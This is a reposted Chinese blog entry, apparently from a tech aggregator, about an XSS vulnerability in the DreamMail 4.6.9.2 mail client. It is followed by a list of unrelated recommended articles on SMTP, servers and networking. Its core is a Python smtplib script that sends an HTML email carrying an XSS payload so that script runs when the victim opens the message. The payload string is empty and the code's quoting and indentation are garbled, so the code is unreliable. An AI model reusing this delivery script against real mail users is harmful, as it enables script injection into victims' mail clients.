DreammailV4.6.9.2XSS漏洞利用网站安全自学php

作者：Ben_Design_114 | 来源：互联网 | 2023-07-06 19:30

转载请注明：@小五义http:www.cnblogs.comxiaowuyi针对版本：DreamMail4.6.9.2测试环境：windowsxpsp3python版本：2.6测试

转载请注明：@小五义 http://www.cnblogs.com/xiaowuyi

针对版本： DreamMail 4.6.9.2
测试环境：windows xp sp3

测试邮箱：126.com

#-*- coding:UTF-8 -*-
#@小五义 http://www.cnblogs.com/xiaowuyi
import smtplib, urllib2
payload = &＃39;&＃39;&＃39;&＃39;&＃39;&＃39;
def sendMail(toemail, smtpsrv, username, password):
msg = "From: XXXX@126.com\n"
msg += "To:YYYY@126.com\n"
msg += &＃39;Date: Today\r\n&＃39;
msg += "Subject: XSS payload\n"
msg += "Content-type: text/ html \n\n"
msg += payload + "\r\n\r\n"
server = smtplib.SMTP()
server.connect(smtpsrv)
server.login(username,password)
try:
server.sendmail(username, toemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "XXXX@126.com" #也可使用其它邮件服务器
password = "XXXXX" #密码
toemail = "YYYY@126.com"
smtpsrv = "smtp.126.com"
print "[*] Sending Email"
sendMail(toemail, smtpsrv, username, password)

发送成功后，当用dreammail浏览该邮件时，会弹窗提示，如下：

该博文仅供学习交流。

推荐阅读

io
SQL Server 连接故障总结与解决方案分析

在使用 SQL Server 时，连接故障是用户最常见的问题之一。通常，连接 SQL Server 的方法有两种：一种是通过 SQL Server 自带的客户端工具，例如 SQL Server Management Studio；另一种是通过第三方应用程序或开发工具进行连接。本文将详细分析导致连接故障的常见原因，并提供相应的解决策略，帮助用户有效排除连接问题。 ... [详细]

蜡笔小新 2024-11-07 08:30:13
import
使用Python和smtplib实现邮件发送功能

本文详细介绍了如何使用Python中的smtplib库来发送带有附件的邮件，并提供了完整的代码示例。作者：多测师_王sir，时间：2020年5月20日 17:24，微信：15367499889，公司：上海多测师信息有限公司。 ... [详细]

蜡笔小新 2024-11-12 12:21:27
io
探讨SMTP AUTH扩展问题及其在Python中的解决方案

本文探讨了SMTP AUTH扩展的问题及其在Python中的应用解决方案。通过分析SMTP协议的安全性不足，提出了使用SMTP AUTH扩展来增强邮件传输的安全性。文章详细介绍了SMTP AUTH的工作原理，并结合Python编程语言，提供了一种实现SMTP AUTH认证的方法。此外，还讨论了常见的实现问题及解决策略，为开发者提供了实用的参考。 ... [详细]

蜡笔小新 2024-11-03 18:27:45
io
Postfix 初级设置指南与实践笔记

公司计划部署邮件服务器，考虑到已有域名，决定自行搭建内部邮件服务器。经过综合考量，最终选择在Linux环境中进行搭建，并记录了相关配置和实践过程。本文将详细介绍Postfix的基本设置步骤和实践经验，帮助读者快速掌握邮件服务器的搭建方法。 ... [详细]

蜡笔小新 2024-11-03 09:59:41
io
通过命令行工具高效运用SMTP协议发送电子邮件

在服务器管理和大规模操作中，常需将系统状态或执行结果通过电子邮件通知相关人员。本文详细介绍了如何利用Linux自带的命令行工具高效地通过SMTP协议发送邮件，提供了一种快速便捷的解决方案。 ... [详细]

蜡笔小新 2024-10-25 19:13:09
shell
解决 Ubuntu 环境下 Hadoop 集群 SSH 密钥认证问题

本文详细介绍了在 Ubuntu 系统上搭建 Hadoop 集群时遇到的 SSH 密钥认证问题及其解决方案。通过本文，读者可以了解如何在多台虚拟机之间实现无密码 SSH 登录，从而顺利启动 Hadoop 集群。 ... [详细]

蜡笔小新 2024-11-13 09:14:02
io
解决 Windows Server 2016 网络连接问题

本文详细介绍了如何解决 Windows Server 2016 在使用无线网络 (WLAN) 和有线网络 (以太网) 时遇到的连接问题。包括添加必要的功能和安装正确的驱动程序。 ... [详细]

蜡笔小新 2024-11-12 00:01:44
import
服务器部署中的安全策略实践与优化

服务器部署中的安全策略实践与优化 ... [详细]

蜡笔小新 2024-11-10 13:04:30
web
Java Web开发入门指南：第一篇教程

作为软件工程专业的学生，我深知课堂上教师讲解速度之快，很多时候需要课后自行消化和巩固。因此，撰写这篇Java Web开发入门教程，旨在帮助初学者更好地理解和掌握基础知识。通过详细记录学习过程，希望能为更多像我一样在基础方面还有待提升的学员提供有益的参考。 ... [详细]

蜡笔小新 2024-11-07 13:36:27
import
PyQt5 QTextEdit：深入解析Python中多功能GUI库的应用与实现

本文详细探讨了 PyQt5 中 QTextEdit 组件在 Python 多功能 GUI 库中的应用与实现。PyQt5 是 Qt 框架的 Python 绑定，提供了超过 620 个类和 6000 个函数及方法，广泛应用于跨平台应用程序开发。QTextEdit 作为其中的重要组件，支持丰富的文本编辑功能，如富文本格式、文本高亮和自定义样式等。PyQt5 的流行性不仅在于其强大的功能，还在于其易用性和灵活性，使其成为开发复杂用户界面的理想选择。 ... [详细]

蜡笔小新 2024-10-28 23:56:36
client
Spring框架下发送嵌入图片邮件时遇到的技术挑战与解决方案

在Spring框架中发送嵌入图片的HTML格式邮件时，常遇到技术挑战。一种有效的解决方案是在邮件内容中直接使用``标签来引用图片。此外，还可以通过MimeMessageHelper类的addInline方法将图片作为内联资源添加到邮件中，确保图片能够正确显示。这种方法不仅提高了邮件的可读性，还增强了用户体验。 ... [详细]

蜡笔小新 2024-10-27 09:29:34
web
如何配置网络端口转发以实现高效通信

端口转发（Port Forwarding）类似于服务重定向，许多路由器中也称其为虚拟服务器（Virtual Server）。通过合理配置端口转发，可以实现外部网络对内部网络中特定设备和服务的高效访问，从而提高通信效率和灵活性。此外，正确设置端口转发还能增强网络安全，确保只有授权的流量能够进入内网，有效防止未授权访问和潜在威胁。 ... [详细]

蜡笔小新 2024-10-24 14:06:09
perl
解决Parallels Desktop错误15265的方法

本文详细介绍了在使用Parallels Desktop时遇到错误15265的多种解决方案，包括检查网络连接、关闭代理服务器和修改主机文件等步骤。 ... [详细]

蜡笔小新 2024-11-12 05:14:12
perl
Kubernetes 控制平面与节点之间的通信机制解析

本文深入解析了 Kubernetes 控制平面（特别是 API 服务器）与集群节点之间的通信机制，并对其通信路径进行了详细分类。旨在帮助用户更好地理解和定制其安装配置，从而增强网络安全性，确保集群的稳定运行。 ... [详细]

蜡笔小新 2024-11-11 21:38:03
client
Nginx入门指南：从零开始掌握基础配置与优化技巧

Nginx入门指南：从零开始掌握基础配置与优化技巧 ... [详细]

蜡笔小新 2024-10-25 15:30:21

Ben_Design_114

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章